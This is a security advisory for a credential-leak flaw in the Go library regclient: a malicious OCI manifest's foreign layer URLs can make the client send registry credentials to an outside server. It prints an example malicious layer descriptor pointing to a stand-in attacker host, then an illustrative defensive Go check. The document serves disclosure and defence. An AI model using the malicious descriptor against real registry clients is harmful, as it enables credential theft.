PT-2026-53024 · Go · github.com/regclient/regclient

Published 2026-06-26 · Updated 2026-06-26 · CVE-2026-49349

CVSS v3.1: 6.8 (Medium)

Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.

Example attack

A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker-controlled host:

```json
{
 "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
 "digest": "sha256:...",
 "size": 1024,
 "urls": ["https://malicious.example.org/blobs/sha256/..."]
}
```
When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.
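The defensive rule the advisory implies, written out as an added example (this is illustrative code, not regclient's own implementation): credentials issued for the registry host are attached only to requests whose host matches that registry exactly, and a pre-pull check lists every foreign layer URL that points elsewhere. The manifest type, hostnames and function names are constructed for this example.

```go
package main

import (
	"encoding/json"
	"net/url"
	"strings"
)

// Minimal subset of an OCI image manifest (constructed for this example).
type descriptor struct {
	Digest string   `json:"digest"`
	URLs   []string `json:"urls,omitempty"`
}

type manifest struct {
	Layers []descriptor `json:"layers"`
}

// sendCredentials reports whether credentials issued for registryHost may be
// attached to a request for target: only over https and only on an exact,
// case-insensitive host match (port included). A foreign-URL fallback to any
// other host therefore always goes out unauthenticated.
func sendCredentials(registryHost, target string) (bool, error) {
	u, err := url.Parse(target)
	if err != nil {
		return false, err
	}
	return u.Scheme == "https" && strings.EqualFold(u.Host, registryHost), nil
}

// foreignURLs returns every layer URL whose host differs from the registry the
// manifest was pulled from, so a pre-pull policy can log or reject them.
func foreignURLs(registryHost string, manifestJSON []byte) ([]string, error) {
	var m manifest
	if err := json.Unmarshal(manifestJSON, &m); err != nil {
		return nil, err
	}
	var out []string
	for _, l := range m.Layers {
		for _, raw := range l.URLs {
			u, err := url.Parse(raw)
			if err != nil {
				return nil, err
			}
			if !strings.EqualFold(u.Host, registryHost) {
				out = append(out, raw)
			}
		}
	}
	return out, nil
}
```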

Timeline

  • 2026-05-25: Advisory submitted
  • 2026-05-26: Fix released

Credit

Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

Fix

Insufficiently Protected Credentials

Weakness Enumeration

Related identifiers

CVE-2026-49349
GHSA-QVQC-4C52-X6QP

Affected products

github.com/regclient/regclient